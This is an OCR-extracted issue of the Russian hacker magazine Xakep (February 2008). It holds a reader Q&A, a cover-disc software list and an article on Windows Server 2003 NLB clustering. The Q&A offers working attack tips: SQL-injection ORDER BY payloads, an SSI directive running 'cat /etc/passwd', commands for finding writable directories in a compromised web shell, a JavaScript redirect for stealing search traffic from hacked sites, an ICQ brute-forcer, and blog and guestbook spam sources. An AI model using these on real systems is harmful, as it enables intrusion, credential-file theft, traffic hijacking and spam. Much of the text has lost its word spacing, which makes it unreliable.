книги хакеры / журнал хакер / 110_Optimized

Q:Какбыстроопределитьколиче- ствополейприSQL-инъекции? A:Все очень просто. Для определения количества полей я обычно использую оператор ORDER BY. К примеру, ты нашел SQL-инъекцию на сайте http://site.com/index. php?p=', долго вставлял в параметр p по одной различные цифры: p=1,2,3,4/*, но так и не смог узнать, сколько же полей содержит злосчастная таблица :). Обойдем это недоразумение очень изящным путем, просто составив запрос следующим образом: http://site. com/index.php?p=1' order by 10/*.

Если в таблице существует больше десяти полей, то скрипт выполнится без ошибки, и тебе следует увеличивать это число до тех пор, пока запрос будет выполняться верно (если ошибкабудет,точисло необходимоуменьшать).Например, еслиприorderby5ошибкинет,апри orderby6уже есть, следовательно, в таблице пять полей и ты смело можешь составлять свой запрос следующим образом: http://site. com/index.php?p=1,2,3,4,5/*.

Q:Какиетызнаешьспособы поискадиректорий,доступных длязаписи,всвежеполученном веб-шелле?

A:1.Если доступна утилита find (which find), то сразу же смотрим вывод команды id и проходимся по следующим запросам:

find ./directory -type d -user ЮЗЕР_ИЗ_ID -ls find ./directory -type d -group ГРУППА_ИЗ_ID -ls find ./directory -type d -perm 0777 -ls

2.Если find недоступна, можно воспользоваться всеми любимым ls с выводом в grep:

ls -la ./directory|grep drwxrwxrwx

Q:Многоеслышалопрограмме

MaleficBruteдлябрутфорсаICQ-

уинов.Гдееевзять?

A:Донедавнеговремениэта программабылаплатнойистоила

400убитыхенотов:).Изфункцийв первуюочередьназываласьвозможностьвысокоскоростногобрута номерковбезиспользованияпрокси. Нонедавнобагприкрыли(после1000 попытоклогинатвойIPбанится,так чтопроксивсеравнопридетсяиспользовать).Послеприкрытиябага программасталадоступнавпаблике. ПочитатьпровозможностиMalefic Brute искачатьеготысможешь

наасечке:http://forum.asechka. ru/showthread.php?p=333870.

Q:Существуетливозможность спамавблогисобходомкапчии регистрацииюзеров?

A:Существует :). Специально для этого умные дяди встроили во все популярные движки блогов (например, WordPress) такие полезные вещи, как pingback и trackback. Не буду рассказывать технические подробности спама через пинг, лучше посоветую очень неплохую статью по теме: http://seorepa.com/show. php?id=991.

Q:Насвежесломанномниксовом шелленеустановленunzip,каким образомтамможноразархивиро- ватьzip-архив?

A:Когда мне довелось столкнуться

стакой проблемой, я использовал для ее решения PHP, благо в Сети существует множество полнофункциональных и бесплатных PHP-файл-менеджеров и классов

свозможностью архивации/разархивации zip-архивов, например: www.vladimirated.com/unzip.lib.zip

— неплохой unzip PHP-класс, www. solitude.dk/filethingie — File Thingie,

небольшой файл-менеджер с возможностью разархивирования архивов.

Q:КакзашифроватьHTML-кодс помощьюJavaScript?

A:Используй неплохой онлайн-сер-

вис http://pr-cy.ru/html_encrypter.

Здесь все просто: в окошко вставляешь HTML-код, давишь на сабмит и получаешь зашифрованный

JavaScript-код :).

Q:Подскажи,какимобразомможновыполнятьсистемныекоманды

ввеб-шелленаPHP,есливключен safe-modeинетвозможности залитьвеб-шеллнаPerl?

A: Почему-то все помнят про выполнение системных команд с помощью Perl и PHP, но напрочь забывают о такой вещи, как ди-

рективы SSI (Server Side Includes).

Это директивы в файлах формата shtml, которые выполняются самим web-сервером без какихлибо сторонних интерпретаторов. С помощью SSI можно творить довольно-таки интересные вещи: начиная с инклудинга файлов и заканчивая выполнением системных команд. Итак, SSI прописывается прямо в теле web-страницы

ввиде:

<html>

<body>

<!--#exec cmd="ls -la /;cat /etc/passwd"--> </body>

</html>

Естественно, при заходе на сайт ты увидишь результат выполнения заданных тобой директив «ls -la /» и «cat /etc/passwd» :).

Q:Агдетыберешьсвежиехалявныепроксиисоксы?

A:Есть замечательный портал www. freeproxy.ru, посвященный всему, что связано с проксями и соксами. Это, например:

— ссылки на сайты с бес платными прокси, — онлайн-прокси-чекеры, — проверка прокси на анонимность,

— списки CGI-прокси (анонимайзеры), — списки бесплатных прокси. — всевозможные факи по

проксям и многое другое.

Аналогичных ресурсов в Сети я пока не видел, разве что только платный, но очень качественный http://5socks.net/ru.

P.S. Еще очень неплохие прокси и соксы всегда лежат на веб-хаке по адресу www.web-hack.ru/proxy.

Q:Подскажи,каксобратьбазу гостевыхкнигдляспама?

A:Вот неплохой онлайн-сервис для сбора спам-баз: http://yourguest. com.ru/test.php. Для поиска госте-

вух можно выбрать поисковик (Яху или Гугл), ключевые слова в URL, TITLE или теле документа.

Q:Хочунаписатьсвойдорген,где быпочитатьинфупотеме? A:Соответствующаяинфавстречается намногихфорумах,посвященныхSEO.

Например,наwww.klikforum.com/ viewtopic.php?t=2562лежитнеплохая статья,описывающаяалгоритмсозданияпростейшегодоргенанаоснове цепейМарковасосвоимишаблонами.

Q:Какбымнехитроперенаправитьтрафспоисковиковнавзломанномсайтенамойсайт?

A:Для этого сеошники и прочие спамеры всего мира используют зашифрованный JavaScript-реди- рект, к примеру:

var ref,i,is_se=0;

var se = new Array(‘google ','msn','yahoo','yandex', 'rambler','aport','mail', 'km.ru', 'meta','all.by', 'tut. by','online.ua','nigma'); if(document. referrer)ref=document. referrer;

else ref='"; for(i=0;i<13;i++) {if(ref. indexOf(se[i])>=0){is_ se=1;document. location='http://Куда ре директить челов с СЕ';}} if(is_se==0){document. location='/Куда пойдет прочая нечисть'}

Этот скрипт перенаправит только тех юзеров, которые зашли на сайт с любого поисковика из массива se. Остальные редиректы тут: http:// hwor.info/useful/redirect.txt.

Q:Подскажисервисгенерации

.htpasswdи.htaccessдляаутенти-

фикациинасайте.

A:Если у тебя нет возможности пользоваться специализированными программами или тебе попросту лень, то тогда обрати внимание

на сервис www.htaccesstools. com/htpasswd-generator. Тут все просто. Вбиваешь имя пользователя и пароль, давишь на сабмит, и сервис выдает тебе готовый htpasswd-файл, который можно использовать на своем сайте для аутентификации.

Q:Какпослатьфайлсодного серверанадругойбезучастия пользователяикакого-либо промежуточногоскачиванияего себенакомп?

A:Конечно, для решения этой проблемы можно использовать FTP, но я все же предпочел бы написать на PHP два скрипта:

1)скрипт-сервер server.php, который посылает содержимое файла в следующем POST-запросе:

POST http://host.com/ client.php HTTP/1.0 Host: host.com Content-Type: multipart/ form-data; boundary=1BEF0 A57BE110FD467A Content-Length: количе ство_символов_в_файле

(функция strlen())

— 1BEF0A57BE110FD467A Content-Disposition: form-data; name="file"; filename="НАЗВАНИЕ_ФАЙЛА. txt"

Content-Type: application/octet-stream Content-Transfer- Encoding: binary — 1BEF0A57BE110FD467A-- Connection: Close

Подпись: содержимое файла

2)скрипт-клиент client.php, который ловит загруженный файл из $_FILES[‘file’][‘tmp_name’].

Q:Гдебымнекупитькрасивый пиаристыйдомен?

A:Наверняка ты слышал об аукционах просроченных доменов, где продаются домены с PR и ТиЦ, вовремя не продленные своими хозяевами. Могу посоветовать некоторые из них: http://auction.nic.ru — аукционы от РУ-центра, на которых можно купить как красивое доменное имя, так и

140

доменное имя с PR и бэклинками (все это для зоны .ru); www.odditysoftware.com/pagedailydomains.htm — список уже освободившихся доменов, многие с PR и бэклинками :); https://www.pool.com/Downloads/ PoolDeletingDomainsList.zip

— список освобождающихся доменов; http://domenforum.net — целый форум, посвященный покупке и продаже доменов по сабжу.

Q:Хочуорганизоватьсвоюсоциальнуюсеть.Нописатьдлятакого проектадвижокснуля—настоя- щеебезумие.Возможно,уже существуютготовыерешения? A: На Западе большое доверие заслужил движок Pligg (www.pligg. com). И хотя его можно заточить под использование в проекте социальной сети, это все-таки система для управления контентом. Если хочешь движок именно для создания социальной сети, рекомендую посмотреть вот эту публикацию — www.habrahabr. ru/blog/idiots_online/33716.html.

Здесь наш соотечественник открывает исходники движка, на котором крутится его проект. Надо сказать, скриптовая система заслуживает всяческого почета и уважения, поскольку в ней реализован почти весь потенциал таких известных проектов, как www.habrahabr.ru

или www.dirty.ru, не говоря уже о том, что разработчик разрешил развивать его начинание! Проект построен на базе PHP, MySQL, Smarty, JsHttpRequest и PHPMailer.

Q:Нужнораспределитьнагрузку намоивеб-серверы.Какоереше- ниепредпочлибывы?

A:Есть достаточно много вариантов, вот лишь некоторые из них:

—  Lighttpd (www.lighttpd.net) и mod_cache, mod_proxy, mod_proxy_ core,

—  nginx (www.sysoev.ru/nginx) и ngx_http_upstream,

—  Apache (www.apache.org) и mod_proxy, mod_proxy_balancer.

Идеального рецепта тут, как водится, нет, и все зависит от личных предпочтений. Мне больше всего импонируют Apache и Lighttpd.

Первый — мощный, но громоздкий. Второй — легкий, удобный и вообще почти идеальный, но, увы, по непонятной причине иногда зависает

на огромной загрузке. В случае с Apache речь идет, конечно же, о второй ветке этого замечательного демона.

Q:Системапроактивнойзащитыв WindowsVistaпростовыводит.Как быеебыстроотключить?

A:Отключить надоедающий UAC можно так: запускаем CMD, набира-

ем msconfig, меню «Tools Disable UAC Launch». Проще способа не существует.

Q:Средивашихпубликаций несколькоразупоминается,что программаSkype,используя P2P-системудляобменаданными, существеннонагружаетинтернетканал,дажевтомслучае,еслисам пользовательзвонкивтекущий моментнеосуществляет.Теперь понятно,кудаисчезаютденежкисмоегосчета:ксожалению, безлимитныхтарифоввмоем городенет.Отсюдавопрос:аесть лиспособотключитьэтутехнологию?Сделатьтак,чтобызараза Skypeбольшенетратиланапрасно трафик,новтожевремяисправно звонила?

A:Действительно, используемый в Skype механизм Supernode

подчас очень серьезно использует доступный ему канал, превращая компьютер пользователя в своего рода ретранслятор или даже прок- си-сервер для передачи данных и соединения с другими пользователями. К сожалению, такой режим используется по умолчанию и без некоторых ухищрений, просто в настройках программы его отключить нельзя. Однако начиная с версии 3.0 можно принудительно запретить программе выступать в качестве активного ретранслятора в P2Pсистеме с помощью реестра. Для этого создай файл NoSuperNode.reg со следующим содержанием:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\ SOFTWARE\Policies\Skype] [HKEY_LOCAL_MACHINE\ SOFTWARE\Policies\Skype\ Phone] "DisableSupernode"=dword: 00000001

После того как изменения в реестр будут внесены, можно перегрузить компьютер. Но хочу предупредить:

прибегать к этому нужно только в том случае, если действительно есть проблемы с каналом. Ведь именно за счет технологии Supernode в сети могут работать пользователи, у которых маскарадный IP или миллион брандмауэров на пути. Само собой, компьютер, расположенный за NAT’ом, в качестве Supernode

выступать не может. Поэтому работа через маршрутизатор — это еще один способ отключить активное использование интернет-канала.

Q:Чтозановаятехнология NHibernateипочемуейпредвещаютуспех?

A:Давай сначала разберемся с понятием ORM. Аббревиатура расшифровывается как Objectrelational mapping, что переводится как «объектно-реляционная проекция». Если не вдаваться в подробности, это технология программирования, позволяющая связать базы данных с концепцией объектноориентированного программирования, создавая «виртуальную объектную базу данных». NHibernate — это как раз реализация принципа ORM

для платформы .NET Framework.

Последняя набирает такие обороты, что сомневаться в ее успешности не приходится. А с учетом серьезной популяризации ORM и работы именно с платформой .NET сомневаться не приходится и в успехе NHibernate. Штука действительно очень удобная: понятная, легко изучаемая. Достаточно посмотреть простенький пример (например,

этот: www.hibernate.org/362.html),

чтобы оценить, насколько проста она в использовании. С любой записью в БД можно работать как с обычным объектом.

User newUser = new User(); newUser.Id = "xakep_Id"; newUser.UserName = "Stepan Ilyin"; newUser.Password = "my_ super_pass"; newUser.EmailAddress = "step@gameland.ru"; newUser.LastLogon = DateTime.Now; session.Save(newUser); transaction.Commit(); session.Close();

Наш объект — это запись в настоящей БД. Вот такая замечательная штука. z

xàêåð 02 /110/ 08

>>WINDOWS >Daily soft 7 Zip 4.57 ACDSee 10

Alcohol 120% 1.9.7.6022

Cute FTP Professional 8.0.7

DAEMON Tools Lite V. 4.12

Download Master 5.5.3.1131

Far Manager 1.70

K-Lite Mega Codec Pack 3.7.0

Miranda IM 0.7.1

mIRC 6.31

Mozilla Firefox 2.0.0.11

Notepad plus-plus 4.7.5

Opera 9.25 for Window

Outpost Firewall Pro 2008

PuTTY 0.60

QIP 2005 Build 8040

Skype 3.6

Starter v5.6.2.8

The Bat! 3.99.29

Total Commander 7.02a

Unlocker 1.8.5

Winamp 5.52

WinRAR 3.71

Xakep CD DataSaver 5.2

>Development ActivePerl 5.10 ActivePython 2.5.1.1 AQtime 5.40

CoffeeCup Web Form Builder 7.6 EmEditor Professional 7.00.1 Jaxer for Windows 0.9

Komodo IDE 4.2.1

NCover 2.0.3

Oracle Maestro 7.10

oXygen XML Editor 9.1

PDK 7.1 Pro

Reflector for .NET 5.0

Reflexil 0.7

RegexBuddy 3.1

SQLite 3.5.5

SQLiteManager 2.6.2

TopStyle 3.5

UltraGram 3.2

>Misc

BurnAware 1.2 Beta

CFi Shelltoys XP 6.2

Chimera Virtual Desktop 1.3.7

Comfort Keys 2.1

Comfort On-Screen Keyboard 2.1.0.0

Datex 0.7.2

Deskcalc 4.2.21

DiffMerge 3.1.0

Equation Wizard 1.2

HyperSnap 6.21.04

MathMagic Personal Edition 5.4 Mobile Master handset manager 7.0.3

Okoker ISO Maker 13969-20

Orfo Switcher 1.16

PDF Toolbox 6

Print2Flash Free Edition 2.7

Rainlendar 2.3

reTune 0.3.0 Scanitto 1.9

Search and Replace 5.9

TypeAndRun 4.7b6

>Multimedia

#1 DVD Ripper 7.0

Ableton Live 7.01

ArtIcons 5.20 Pro

BB TestAssistant 1.5.6

Bixorama 1.37

CrazyTalk 5 Pro

D3DGear 3.08

EarMaster Pro 5.0

Effect3D Studio 1.1

Fluid Mask 3.0.8

MakeUp Pilot 2.0

NASA World Wind 1.4

Picasa 2

Stellarium 0.9.1

True BoxShot 1.7

YamiPod 1.7

>Net

AChat v0.150

AntiNAT

Becky! Internet Mail 2.44.00 CrazyTalk for Skype 2.0 DeepScan 2.6

DMBook 2.1.16.2008

DU Meter 4.0

Fiddler2

gDocsBar 0.5.5

Maxthon 2.0.8 Ru-Board Edition

MX Skype Recorder 3.5.2

Pidgin 2.3.1

PingPlotter 3.20

RaidenDNSD 1.3

RaidenMAILD 1.9.14

SIPT

Site-Auditor 1.51

WideCap 1.4

Yakoon 2

>System

Boson NetSim for CCNP 7.0 Comodo Memory Firewall 2.0 CoreForce 0.95

Flyakite OSX 3.5

IDEAL Administration 2008

IDEAL Dispatch 2007

IDEAL Migration 2008

LiteWeb 2.7

MySQL 5.0.51a

OpManager 7.0

Password Door 8.4

PerfectDisk 2008 Professional

PostgreSQL 8.3

Sentry 3.0 Beta 7

SharpOS 0.0.1

SiSoftware Sandra Lite XII.2008.SP1 UFS Explorer Professional Recovery 3.9.1

VirtualWiFi 1.0

VMware Server 2.0 Beta

>>UNIX

>Desktop Amarok 1.4.8 Avidemux 2.4 Digikam 0.9.3 Fvwm 2.5.24

Imagemagick 6.3.8-0

Openbox 3.4.5

Openoffice 2.3.1

Scribus 1.3.3.11

Ufraw 0.13

>Devel Anjuta 2.3.2

Asymptote 1.40

Code-browser 2.19

Eric4 4.0.4

Gcc 4.2.2

Geany 0.12

Php 5.2.5

Qt 4.3.3

Qucs 0.0.13

Source-highlight 2.8

>Games Freecol 0.7.2

Hedgewars 0.9.2

Openttd 0.6.0 beta3

>Net

Aria2 0.12.0

Filezilla 3.0.5.2

Ktorrent 2.2.4

Mldonkey 2.9.3

Netxms 0.2.19

Opera 9.25

Phpmyadmin 2.11.4

Pidgin 2.3.1

Rabbitmq 1.2.0

>Security Clamav 0.92 Fwbuilder 2.1.16

Kismet 2007-10 R1

Nikto 2.02

Nmap 4.53

Openssl 0.9.8g

Stunnel 4.21

Sudo 1.6.9p12

>Server Amavisd-new 2.5.3 Apache 2.2.8

Asterisk 1.4.17

Bind 9.4.2

Courier-imap 4.3.0

Cups 1.3.5

Dbmail 2.2.9rc1

Dhcp 3.1.0

Dovecot 1.0.10

Mysql 5.0.51

Nut 2.2.1

Openldap 2.3.39

Openssh 4.7p1

Openvpn 2.0.9

Postfix 2.5.0

Postgresql 8.2.6

Samba 3.0.28

Sendmail 8.14.2

Snort 2.8.0.1

Sqlite 3.5.4

Squid 3.0STABLE1

Vsftpd 2.0.5

>System Ati 8.01

>X-Distr CentOS 5.1

DSL Xakep Edition 4.0-p1

>>ВИДЕО

>VisualHack++

Криптуем все и вся

Крякинг — это просто! Оракловый эксплойт Системные шалости Удар по PHP

>Видео для админов Деликатное проникновение в частную сеть Звездные счета

На обломках RAID-массива Непотопляемый сервер

x № 02(110) февраль 2008

ВЫГОДА ГАРАНТИЯ СЕРВИС

Как оформить заказ

1.Разборчивозаполнитеподписнойкупониквитанцию,выре-

завихизжурнала,сделавксерокопиюилираспечатавс

сайтаwww.glc.ru.

2.ОплатитеподпискучерезСбербанк.

3.Вышлитевредакциюкопиюподписныхдокументов—купо-

наиквитанции—любымизнижеперечисленныхспособов

поэлектроннойпочте subscribe@glc.ru;

пофаксу 8(495)780-88-24;

поадресу 119021,Москва,

ул.ТимураФрунзе,д.11,стр.44,

ООО«ГеймЛэнд»,отделподписки.

Внимание!

Подпискаоформляетсявденьобработки купонаиквитанциивредакции:

втечениепятирабочихднейпослеотправкиподписныхдокументоввредакциюпофаксуилиэлектроннойпочте;

втечение20рабочихднейпослеотправкиподпис

ныхдокументовпопочтовомуадресуредакции. Рекомендуемиспользоватьфаксилиэлектроннуюпочту,впоследнемслучаепредварительноотсканировавилисфотографировавдокументы.

Подпискаоформляетсясномера,выходящегочерезодин календарныймесяцпослеоплаты.Например,есливыпроиз-

водитеоплатувноябре,тожурналбудетеполучатьсянваря.

ХАКер.PRO

дляЧеГОНужеНКлаСтеР

Кластерыприменяютворганизациях,которымнужнакруглосуточнаяи бесперебойнаядоступностьсервисовигделюбыеперерывывработенежелательныинедопустимы.Иливтехслучаях,когдавозможенвсплескнагрузки,с которымможетнесправитьсяосновнойсервер,тогдаеепомогуткомпенсироватьдополнительныехосты,выполняющиеобычнодругиезадачи.

Дляпочтовогосервера,обрабатывающегодесяткиисотнитысячписемв день,иливеб-сервера,обслуживающегоонлайн-магазины,использование кластеровоченьжелательно.Дляпользователяподобнаясистемаостается полностьюпрозрачной—всягруппакомпьютеровбудетвыглядетькакодин сервер.Использованиенескольких,пустьдажеболеедешевых,компьютеровпозволяетполучитьвесьмасущественныепреимуществапередодиноч-

>>

ХАКЕР

Диспетчер NLB

нымишустрымсервером.Эторавномерноераспределениепоступающих запросов,повышеннаяотказоустойчивость,таккакпривыходеодного элементаегонагрузкуподхватываютдругиесистемы,масштабируемость, удобноеобслуживаниеизаменаузловкластера,атакжемногоедругое. Выходизстрояодногоузлаавтоматическиобнаруживается,инагрузка перераспределяется,дляклиентавсеэтоостанетсянезамеченным.

ВозможностиWin2k3

Вообщеговоря,одникластерыпредназначеныдляповышениядоступ- ностиданных,другие—дляобеспечениямаксимальнойпроизводитель- ности.ВконтекстестатьинасбудутинтересоватьMPP(MassiveParallel Processing)—кластеры,вкоторыходнотипныеприложениявыполняются нанесколькихкомпьютерах,обеспечиваямасштабируемостьсервисов. Существуетнесколькотехнологий,позволяющихраспределятьнагрузку междунесколькимисерверами:перенаправлениетрафика,трансляцияадресов,DNSRoundRobin,использованиеспециальныхпрограмм, работающихнаприкладномуровне,вродевеб-акселераторов.ВWin2k3, вотличиеотWin2k,поддержкакластеризациизаложенаизначальнои поддерживаетсядватипакластеров,отличающихсяприложениямии спецификойданных:

1.КластерыNLB(NetworkLoadBalancing)—обеспечиваютмасштабируе- мостьивысокуюдоступностьслужбиприложенийнабазепротоколовTCP иUDP,объединяяводинкластердо32серверовсодинаковымнабором данных,накоторыхвыполняютсяодниитежеприложения.Каждый запросвыполняетсякакотдельнаятранзакция.Применяютсядляработы снаборамиредкоизменяющихсяданных,вродеWWW,ISA,службами терминаловидругимиподобнымисервисами.

2.Кластерысерверов—могутобъединятьдовосьмиузлов,ихглавная задача—обеспечениедоступностиприложенийприсбое.Состоятиз активныхипассивныхузлов.Пассивныйузелбольшуючастьвремени простаивает,играярольрезерваосновногоузла.Дляотдельныхприложенийестьвозможностьнастроитьнесколькоактивныхсерверов,распределяянагрузкумеждуними.Обаузлаподключеныкединомухранилищу данных.Кластерсерверовиспользуетсядляработысбольшимиобъемами частоизменяющихсяданных(почтовые,файловыеиSQL-серверы).При- чемтакойкластернеможетсостоятьизузлов,работающихподуправлениемразличныхвариантовWin2k3:EnterpriseилиDatacenter(версииWeb иStandartкластерысерверовнеподдерживают).

ВMicrosoftApplicationCenter2000(итолько)имелсяещеодинвидкласте- ра—CLB(ComponentLoadBalancing),предоставляющийвозможность распределенияприложенийCOM+междунесколькимисерверами.

NLB-кластеры

Прииспользованиибалансировкинагрузкинакаждомизхостовсоздается виртуальныйсетевойадаптерсосвоимнезависимымотреальногоIPи МАС-адресом.Этотвиртуальныйинтерфейспредставляеткластеркак единыйузел,клиентыобращаютсякнемуименноповиртуальному адресу.Всезапросыполучаютсякаждымузломкластера,нообрабатываютсятолькоодним.Навсехузлахзапускаетсяслужбабалансировки сетевойнагрузки(NetworkLoadBalancingService),которая,используя специальныйалгоритм,нетребующийобменаданнымимеждуузлами,

Настройка параметров кластера

принимаетрешение,нужнолитомуилииномуузлуобрабатыватьзапрос илинет.Узлыобмениваютсяheartbeat-сообщениями,показывающими ихдоступность.Еслихостпрекращаетвыдачуheartbeatилипоявляется новыйузел,остальныеузлыначинаютпроцесссхождения(convergence), зановоперераспределяянагрузку.Балансировкаможетбытьреализована водномиздвухрежимов:

1)unicast—одноадреснаярассылка,когдавместофизическогоМАС используетсяМАСвиртуальногоадаптеракластера.Вэтомслучаеузлы кластеранемогутобмениватьсямеждусобойданными,используяМАСадреса,толькочерезIP(иливторойадаптер,несвязанныйскластером);

2)multicast—многоадреснаярассылка,МАС-адрескластераназначается физическомуадресу,нонезатираяего.Дляреализацииэтогометодамар- шрутизаторыдолжныподдерживатьгрупповыеМАС-адреса.

Впределаходногокластераследуетиспользоватьтолькоодинизэтих режимов.

МожнонастроитьнесколькоNLB-кластеровнаодномсетевомадапте- ре,указавконкретныеправиладляпортов.Такиекластерыназывают виртуальными.Ихприменениедаетвозможностьзадатьдлякаждого приложения,узлаилиIP-адресаконкретныекомпьютерывсоставепер- вичногокластераилиблокироватьтрафикдлянекоторогоприложения, незатрагиваятрафикдлядругихпрограмм,выполняющихсянаэтомузле.

Илинаоборот,NLB-компонентможетбытьпривязанкнесколькимсетевым адаптерам,чтопозволитнастроитьряднезависимыхкластеровнакаждом узле.Такжеследуетзнать,чтонастройкакластеровсерверовиNLBна одномузленевозможна,посколькуонипо-разномуработаютссетевыми устройствами.

Администраторможетсделатьнекуюгибриднуюконфигурацию,обла- дающуюдостоинствамиобоихметодов,например,создавNLB-кластери настроиврепликациюданныхмеждуузлами.Норепликациявыполняется непостоянно,авремяотвремени,поэтомуинформациянаразныхузлах некотороевремябудетотличаться.

Стеориейнаэтомзакончим,хотяопостроениикластеровможнорассказывать ещедолго,перечисляявозможностиипутинаращивания,даваяразличные рекомендацииивариантыконкретнойреализации.Всеэтитонкостиинюансы оставимдлясамостоятельногоизученияиперейдемкпрактическойчасти.

НастройкаNLB-кластера

ДляорганизацииNLB-кластеровдополнительноеПОнетребуется,все производитсяимеющимисясредствамиWin2k3.Длясоздания,поддержки имониторингаNLB-кластеровиспользуюткомпонент«Диспетчербалан-

сировкисетевойнагрузки»(NetworkLoadBalancingManager),которыйна-

ХАКЕР.PRO

Выбор интерфейса для работы кластера

ходитсявовкладке«Администрирование»«Панелиуправления»(команда NLBMgr).Таккаккомпонент«Балансировканагрузкисети»ставитсякак стандартныйсетевойдрайверWindows,установкуNLBможновыполнять иприпомощикомпонента«Сетевыеподключения»,вкоторомдоступен соответствующийпункт.Нолучшеиспользоватьтолькопервыйвариант, одновременноезадействованиедиспетчераNLBисетевыхподключений можетпривестикнепредсказуемымрезультатам.

ДиспетчерNLBпозволяетнастраиватьиуправлятьизодногоместаработойсразунесколькихкластеровиузлов.

ВозможнатакжеустановкаNLB-кластеранакомпьютересоднимсетевым адаптером,связаннымскомпонентом«Балансировканагрузкисети»,но вэтомслучаеприрежимеunicastдиспетчерNLBнаэтомкомпьютерене можетбытьиспользовандляуправлениядругимиузлами,асамиузлыне могутобмениватьсядругсдругоминформацией.

Дляупрощениябудемсчитать,чтооперационныесистемыустановлены, сетевыеподключениянастроены(какобычно),узлыбудущегокластера подключеныкActiveDirectoryиутебяестьсоответствующиеправа.

ТеперьвызываемдиспетчерNLB.Кластеровунаспоканет,поэтомупоявившеесяокнонесодержитникакойинформации.Выбираемвменю«Кластер» пункт«Новый»иначинаемзаполнятьполявокне«Параметрыкластера».В поле«НастройкаIP-параметровкластера»вводимзначениевиртуального IP-адресакластера,маскуподсетииполноеимя.Значениевиртуального МАС-адресаустанавливаетсяавтоматически.Чутьнижевыбираемрежим работыкластера:одноадресныйилимногоадресный.Обративниманиена флажок«Разрешитьудаленноеуправление»—вовсехдокументахMicrosoft настоятельнорекомендуетегонеиспользоватьвоизбежаниепроблем, связанныхсбезопасностью.Вместоэтогоследуетприменятьдиспетчерили другиесредстваудаленногоуправления,напримеринструментарийуправленияWindows(WMI).Еслижерешениеобегоиспользованиипринято, следуетвыполнитьвсенадлежащиемероприятияпозащитесети,прикрыв дополнительнобрандмауэромUDP-порты1717и2504.

Послезаполнениявсехполейнажимаем«Далее».Вокне«IP-адреса кластера»принеобходимостидобавляемдополнительныевиртуальные IP-адреса,которыебудутиспользоватьсяэтимкластером.Вследующем окне«Правиладляпортов»можнозадатьбалансировкунагрузкидля одногоилидлягруппыпортоввсехиливыбранногоIPпопротоколамUDP илиTCP,атакжеблокироватьдоступккластеруопределеннымпортам (чтомежсетевойэкраннезаменяет).Поумолчаниюкластеробрабаты- ваетзапросыдлявсехпортов(0–65365);лучшеэтотсписокограничить, внесявнеготолькодействительнонеобходимые.Хотя,еслинетжелания возиться,можнооставитьвсе,какесть.Кстати,вWin2kпоумолчаниювесь

Установка параметров узла

трафик,направленныйккластеру,обрабатывалтолькоузел,имевший наивысшийприоритет,остальныеузлыподключалисьтолькопривыходе изстрояосновного.

Например,дляIISпотребуетсявключитьтолькопорты80(http)и443 (https).Причемможносделатьтак,чтобы,например,защищенныесоединенияобрабатывалитолькоопределенныесерверы,накоторыхустановленсертификат.Длядобавленияновогоправиланажимаем«Добавить», впоявившемсядиалоговомокневводимIP-адресузлаили,еслиправило распространяетсянавсех,оставляемфлажок«Все».Вполях«С»и«По» диапазонапортовустанавливаемодноитожезначение—80.Ключевым полемявляется«Режимфильтрации»(FilteringMode)—здесьзадается, кембудетобработанэтотзапрос.Доступнотриполя,определяющие режимфильтрации:«Несколькоузлов»,«Одинузел»и«Отключитьэтот диапазонпортов».Выбор«Одинузел»означает,чтотрафик,направленныйнавыбранныйIP(компьютераиликластера)суказаннымномером порта,будетобрабатыватьсяактивнымузлом,имеющимнаименьший показательприоритета(онемчутьниже).Выбор«Отключить…»значит, чтотакойтрафикбудетотбрасыватьсявсемиучастникамикластера.

Врежимефильтрации«Несколькоузлов»можнодополнительноуказатьвариантопределениясходстваклиентов,чтобынаправлятьтрафикотзаданного клиентакодномуитомужеузлукластера.Возможнытриварианта:«Нет», «Одно»или«КлассC».Выборпервогоозначает,чтоналюбойзапросбудет отвечатьпроизвольныйузел.Нонеследуетегоиспользовать,есливправиле выбранпротоколUDPили«Оба».Приизбранииостальныхпунктовсходство клиентовбудетопределятьсяпоконкретномуIPилидиапазонусетиклассаС. Итак,длянашегоправилас80 мпортомостановимсвойвыборнавариан- те«Несколькоузлов—классC».Правилодля443заполняеманалогично, ноиспользуем«Одинузел»,чтобыклиентувсегдаотвечалосновнойузел снаименьшимприоритетом.Еслидиспетчеробнаружитнесовместимое правило,будетвыведенопредупреждающеесообщение,дополнительнов журналсобытийWindowsбудетвнесенасоответствующаязапись.

Далееподключаемсякузлубудущегокластера,введяегоимяилиреальный IP,иопределяеминтерфейс,которыйбудетподключенксетикластера.В окне«Параметрыузла»выбираемизспискаприоритет,уточняемсетевыенастройки,задаемначальноесостояниеузла(работает,остановлен,приостановлен).Приоритетодновременноявляетсяуникальнымидентификатором узла;чемменьшеномер,темвышеприоритет.Узелсприоритетом1является мастер-сервером,впервуюочередьполучающимпакетыидействующимкак менеджермаршрутизации.

Флажок«Сохранитьсостояниепослеперезагрузкикомпьютера»позволяетвслучаесбояилиперезагрузкиэтогоузлаавтоматическиввестиего

>>

ХАКЕР